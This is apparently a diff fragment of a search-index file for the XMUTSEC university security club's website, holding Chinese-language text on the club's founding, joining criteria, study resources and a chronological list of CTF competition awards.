X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002
\u6211\u4eec\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d
\u7684\u6210\u7ee9\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00
\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b
\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002
\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002
\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002
\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002
\u672c\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u83b7\u5956\u56fe\u7247\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"11
"}]}
\ No newline at end of file
+{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002
\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn
"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63
\u5bf9\u8ba1\u7b97\u673a\u5b89\u5168\u6709\u7740\u6d53\u539a\u7684\u5174\u8da3
\u5bf9\u65b0\u4e8b\u7269\u6709\u7740\u5f3a\u70c8\u7684\u63a2\u7d22\u6b32\u671b
\u80fd\u591f\u5b8c\u6210\u6211\u4eec\u51fa\u7684\u65b0\u751f\u8d5b\u9898\uff08\u6821\u8d5b\uff09
\u80fd\u72ec\u7acb\u89e3\u51b3\u4e00\u9898\u5927\u578bCTF\u7ade\u8d5b\u7684\u9898
\u9ad8\u4e2d\u81ea\u5b66\u7b97\u6cd5\u6216\u53c2\u52a0\u8fc7\u7b97\u6cd5\u7ade\u8d5b
\u7834\u89e3\u8fc7\u67d0\u4e9b\u8f6f\u4ef6
\u5728CNVD\u3001EDUSRC\u3001HackerOne\u3001\u8865\u5929\u3001360\u3001\u963f\u91cc\u4e91\u5148\u77e5\u3001\u6216\u8005\u5728\u4f01\u4e1aSRC\uff08\u534e\u4e3a\u3001\u817e\u8baf\u3001B\u7ad9\uff09\u53d1\u8868\u6587\u7ae0\u6216\u8005\u6316
\u6398\u5e76\u63d0\u4ea4\u6f0f\u6d1e\u62a5\u544a
\u72ec\u81ea\u7814\u7a76\u8fc7\u53ef\u4fe1\u6280\u672f\u3001\u91cf\u5b50\u5b89\u5168\u3001\u4eba\u5de5\u667a\u80fd\u5b89\u5168\u3001\u5de5\u4e1a\u63a7\u5236\u5b89\u5168
\u2026\u6216\u662f\u5176\u4ed6\u4efb\u4f55\u548c\u4fe1\u606f\u5b89\u5168\u6709\u5173\u7684\u4e8b\u60c5\u3002
"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":" \u7ebf\u4e0a\u81ea\u5b66
\u534f\u4f1a\u5b66\u4e60\u5e73\u53f0\uff1ahttps://cloud.xmutsec.cn
\u5b66\u4e60\u8d44\u6599\uff1ahttps://ctf-wiki.github.io/ctf-wiki/
\u5237\u9898
\u901b\u5927\u4f6c\u4eec\u7684\u535a\u5ba2
\u575a\u6301
\u575a\u6301
\u575a\u6301
\u534f\u4f1a\u7f51\u76d8\u91cc\u62e5\u6709\u5b66\u4e60\u7f51\u7edc\u5b89\u5168\u7684\u6240\u6709\u8d44\u6599\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u4e0b\u8f7d\u5b66\u4e60\uff0c\u5982\u9047\u5230\u56f0\u96be\u53ef\u5148\u81ea\u884c\u89e3\u51b3\uff08\u6ce8\u610f\u7ffb\u9605\u300a\u63d0\u95ee\u7684\u667a\u6167\u300b\uff09\uff0c\u89e3\u51b3\u4e0d\u4e86\u7684\u5728\u5411\u5b66\u957f\u6216\u5b66\u59d0\u53d1\u8d77\u63d0\u95ee\uff0c\u7406\u5de5\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6b22\u8fce\u5168\u6821\u540c\u5b66\u7684\u5230\u6765\uff0c\u534f\u4f1a\u6bcf\u5b66\u671f\u4f1a\u4e3e\u529e\u4e00\u573a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff0c\u7528\u4e8e\u6218\u961f\u9009\u62d4\uff0c\u83b7\u5f97\u5956\u9879\u7684\u540c\u5b66\u5373\u53ef\u52a0\u5165XMUTSEC\u6216CodeMonster\u6218\u961f\uff0c\u53c2\u4e0e\u5b66\u672f\u7ade\u8d5b\u548c
"},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":" [2022\u5e7411\u670819\u65e5] - 2022\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2022\u5e7409\u670806\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b\u4e2d\u83b7\u4e09\u7b49\u5956
[2022\u5e7407\u670807\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u534e\u4e1c\u5357\u5206\u533a\u8d5b\u4e2d\u559c\u83b7\u4f73\u7ee9
[2021\u5e7412\u670811\u65e5] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2019\u5e7409\u670816\u65e5] - \u6211\u9662\u5b66\u5b50\u57282019\u5e74\u201c\u9ed1\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u77e5\u8bc6\u548c\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\u83b7\u5168\u7701\u4e9a\u519b
[2018\u5e7412\u670819\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u56db\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e8c\u540d
[2018\u5e7412\u670810\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u6211\u9662\u5b66\u5b50\u57282017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u53d6\u5f97\u4f18\u5f02\u6210\u7ee9
[2017\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e09\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u56e2\u961f\u5728\u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u4e2d\u52c7\u593a\u5168\u7701\u7b2c\u4e8c\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u4fe1\u606f\u5b89\u5168\u56e2\u961f\u5728\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u83b7\u4f73\u7ee9
[2017\u5e7405\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\u5706\u6ee1\u843d\u5e55
[2017\u5e7405\u670807\u65e5] - \u6211\u9662\u987a\u5229\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u4fe1\u606f\u5b89\u5168\u6821\u8d5b\u603b\u51b3\u8d5b
[2017\u5e7404\u670828\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u4e2d\u559c\u83b7\u5b63\u519b
[2016\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u559c\u83b7\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4f73\u7ee9
"},{"location":"award/#_3","title":"\u4e3b\u529e","text":" [2022/11/04] - 2022\u5e74 SkyNICOCTF \u66a8\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2022/05/??] - 2022\u5e74CMCTF-5\uff08AWD\uff09\u7ebf\u4e0a\u653b\u9632\u5bf9\u6297\u8d5b [2022/04/??] - 2022\u5e74CMCTF-4\uff08CTF\uff09\u6bd4\u8d5b [2021/10/??] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2018/??/??] - 2018\u5e74\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b [2018/02/13] - \u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u2642\u2642\u2642 [2017/05/06] - \u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b "},{"location":"award/#2023","title":"2023","text":" [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b \u4e00\u7b49\u5956\uff08\u7b2c5\u540d\uff09 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5de5\u63a7\u5b89\u5168\u6311\u6218\u521b\u65b0\u5355\u9879\u5956 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/04] - 2023\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u51b3\u8d5b \u5730\u70b9\uff1a\u91cd\u5e86\uff0c\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2023/06/27] - \u7b2c\u4e09\u5c4a\u4e2d\u56fd\uff08\u6c88\u9633\uff09\u667a\u80fd\u7f51\u8054\u6c7d\u8f66\u5927\u8d5b\u51b3\u8d5b\uff08\u667a\u80fd\u7f51\u8054\u6c7d\u8f66 \"\u5929\u878d\u4fe1\u676f\" \u4fe1\u606f\u5b89\u5168\u653b\u9632\u8d5b\uff09\u521d\u8d5b12\u540d \u5730\u70b9\uff1a\u6211\u89c9\u5f97\u4e3b\u529e\u65b9\u5f88\u6709\u5fc5\u8981\u5b66\u4e60\u4e00\u4e0b\u5dee\u65c5\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u673a\u7968\u592a\u8d35\u98de\u4e0d\u4e86\u6c88\u9633 [2023/06/24] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\uff08\u534e\u4e1c\u5357\u5206\u533a\u9009\u62d4\u8d5b\uff09\uff0c\u56e2\u4f53\u4e00\u7b49\u5956\uff08\u664b\u7ea7\u603b\u51b3\u8d5b\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/06/03] - 2023\u5e74\u798f\u5efa\u7701\u7b2c\u56db\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u5168\u56fd\u5927\u5b66\u751f\u8d5b\u9053\uff09\u521d\u8d5b\u5168\u7701\u7b2c\u4e00/\u51b3\u8d5b\u4e09\u7b49\u5956\uff08\u4e0b\u534a\u573a\u5165\u573a\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/05/xx-06-xx] - \u67d0\u884c\u52a8\uff0c\u4fdd\u5bc6 [2023/05/29] - 2023\u5e74\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u653b\u9632\u8d5b \u7b2c24\u540d \u5730\u70b9\uff1a\u80fd\u8fdb\u7ebf\u4e0b\uff0c\u4f46\u7ecf\u8d39\u4e0d\u591f\uff0c\u6240\u4ee5\u5c31\u6ca1\u53bb\u4e86\uff08 [2023/05/06] - 2023\u5e74\u9996\u5c4a\u201c\u76d8\u53e4\u77f3\u676f\u201d\u5168\u56fd\u7535\u5b50\u6570\u636e\u53d6\u8bc1\u5927\u8d5b \u7b2c61\u540d\uff08\u5dee1\u540d\u8fdb\u7ebf\u4e0b\uff09 \u5730\u70b9\uff1a\u7ebf\u4e0a\uff0c\u5982\u679c\u8fdb\u7684\u8bdd\u5c31\u80fd\u53bb\u5357\u4eac\u4e86\uff0c\u8fd9\u6ce2\u662f\u8bbe\u5907\u95ee\u9898 [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b\uff0838/50\uff0cCodeMonster\uff09\uff0cx1aoB1n \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u534a\u51b3\u8d5b\uff0813/109\u540d\uff0cCodeMonster\uff09\uff0c\u664b\u7ea7\u603b\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/01/10] - 2023\u5e74\u7b2c\u56db\u5c4a\u201c\u957f\u57ce\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e00\u8d5b\u533a\uff0c\u56e2\u4f53\u4e09\u7b49\u5956 \uff08FUCK U, COVID-19/\ud83d\udc47\uff09
"},{"location":"award/#2022","title":"2022","text":" [2022/10/??] - 2022\u5e74\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u5ba3\u4f20\u5468\u798f\u5efa\u7701\u7b2c\u4e09\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u8d5b\u9053\uff09 \u4f18\u79c0\u5956\uff08CodeMonster/XMUTSEC\uff09 \u5730\u70b9\uff1a\u798f\u5dde [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u4e2a\u4eba\u91d1\u724c \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u7ebf\u4e0a [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u56e2\u4f53\u4e8c\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u2014\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u603b\u51b3\u8d5b \u56e2\u4f53\u4e09\u7b49\u5956 \u7ebf\u4e0a [2022/06/28] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b \u534e\u4e1c\u5357\u8d5b\u533a \u56e2\u4f53\u4e00\u7b49\u5956 \u7ebf\u4e0a "},{"location":"award/#2021","title":"2021","text":" [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u6559\u80b2\u884c\u4e1a\u653b\u9632\u8d5b\u9053\uff0c\u9632\u5b88\u65b9\u7b2c\u4e00\u540d \u7ebf\u4e0a [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u9ed1\u76fe\u8d5b\u9053\uff0c\u9ad8\u6821\u7ec4\u7b2c\u4e09\u540d\u3001\u7b2c\u4e09\u540d \u5730\u70b9\uff1a\u798f\u5dde \uff08FUCK U, COVID-19/\ud83d\udc46\uff09
"},{"location":"award/#2020","title":"2020","text":" [2020/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e00\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2020/??/??] - \u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde "},{"location":"award/#2019","title":"2019","text":" [2019/??/??] - X-NUCA \u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b \u7b2c 23 \u540d [2019/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u7701\u8d5b \u4e00\u7b49\u5956 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u56db\u5ddd\uff0c\u6210\u90fd\u5e02\u6210\u534e\u533a\u5efa\u8bbe\u5317\u8def\u4e00\u6bb558\u53f7\u4e16\u8302\u6210\u90fd\u8302\u5fa1\u9152\u5e97\uff084F\u5927\u5bb4\u4f1a\u5385\uff09 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u534e\u4e1c\u5357\u8d5b\u533a\u534a\u51b3\u8d5b \u7279\u7b49\u5956 